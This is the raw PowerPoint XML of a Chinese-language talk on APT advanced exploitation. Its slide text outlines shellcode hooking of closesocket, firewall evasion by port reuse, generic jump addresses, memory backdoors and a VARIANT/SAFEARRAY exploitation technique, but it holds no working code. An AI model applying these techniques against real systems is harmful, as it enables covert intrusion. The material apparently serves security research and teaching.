              <a:t>wins: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> hook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>closesocket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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送错误数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拦截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zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的端口复用技术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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 服务的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rpcnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入口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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>NdrSendReceive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dirty="0"/>
              <a:t>溢出程序通用性技术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连续覆盖</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同时使用ret、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>seh</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动版本识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用跳转地址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代码页地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用指针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PEB-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RtlEnterCriticalSection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PEB-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RtlLeaveCriticalSection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7021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shellcode 高级技术</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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4048" y="1638795"/>
            <a:ext cx="8174736" cy="43293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解码+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shellcode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Shellcode通用性 GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  LoadLibraryA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>c语言编写shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编写具有shell功能的shellcode </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内存后门技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通信加密</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412472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1118</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>281</Paragraphs>
  <Slides>29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APT 高级漏洞利用技术</vt:lpstr>
      <vt:lpstr>Who am  I ?</vt:lpstr>
      <vt:lpstr>要点</vt:lpstr>
      <vt:lpstr>漏洞挖掘技术</vt:lpstr>
      <vt:lpstr>漏洞利用技术</vt:lpstr>
      <vt:lpstr>对抗防火墙</vt:lpstr>
      <vt:lpstr>对抗防火墙</vt:lpstr>
      <vt:lpstr>溢出程序通用性技术</vt:lpstr>
      <vt:lpstr>shellcode 高级技术</vt:lpstr>
      <vt:lpstr>APT对抗时代</vt:lpstr>
      <vt:lpstr>APT 高级漏洞利用技术</vt:lpstr>
      <vt:lpstr>突破点</vt:lpstr>
      <vt:lpstr>tagVARIANT的定义</vt:lpstr>
      <vt:lpstr>VARTYPE列举</vt:lpstr>
      <vt:lpstr>tagSAFEARRAY的定义</vt:lpstr>
      <vt:lpstr>具体利用实现细节</vt:lpstr>
      <vt:lpstr>跟踪演示代码</vt:lpstr>
      <vt:lpstr>跟踪过程</vt:lpstr>
      <vt:lpstr>跟踪过程</vt:lpstr>
      <vt:lpstr>执行结果</vt:lpstr>
      <vt:lpstr>实现代码</vt:lpstr>
      <vt:lpstr>实现代码</vt:lpstr>
      <vt:lpstr>实现代码</vt:lpstr>
      <vt:lpstr>代码效果</vt:lpstr>
      <vt:lpstr>代码效果</vt:lpstr>
      <vt:lpstr>代码效果</vt:lpstr>
      <vt:lpstr>防护技术</vt:lpstr>
      <vt:lpstr>防护技术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正标题：360品牌战略调整 副标题：调整细节执行</dc:title>
  <dc:creator>l</dc:creator>
  <cp:lastModifiedBy>袁仁广</cp:lastModifiedBy>
  <cp:revision>77</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-03-19T07:53:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-05-30T08:04:42Z</dcterms:modified>
</cp:coreProperties>
</file>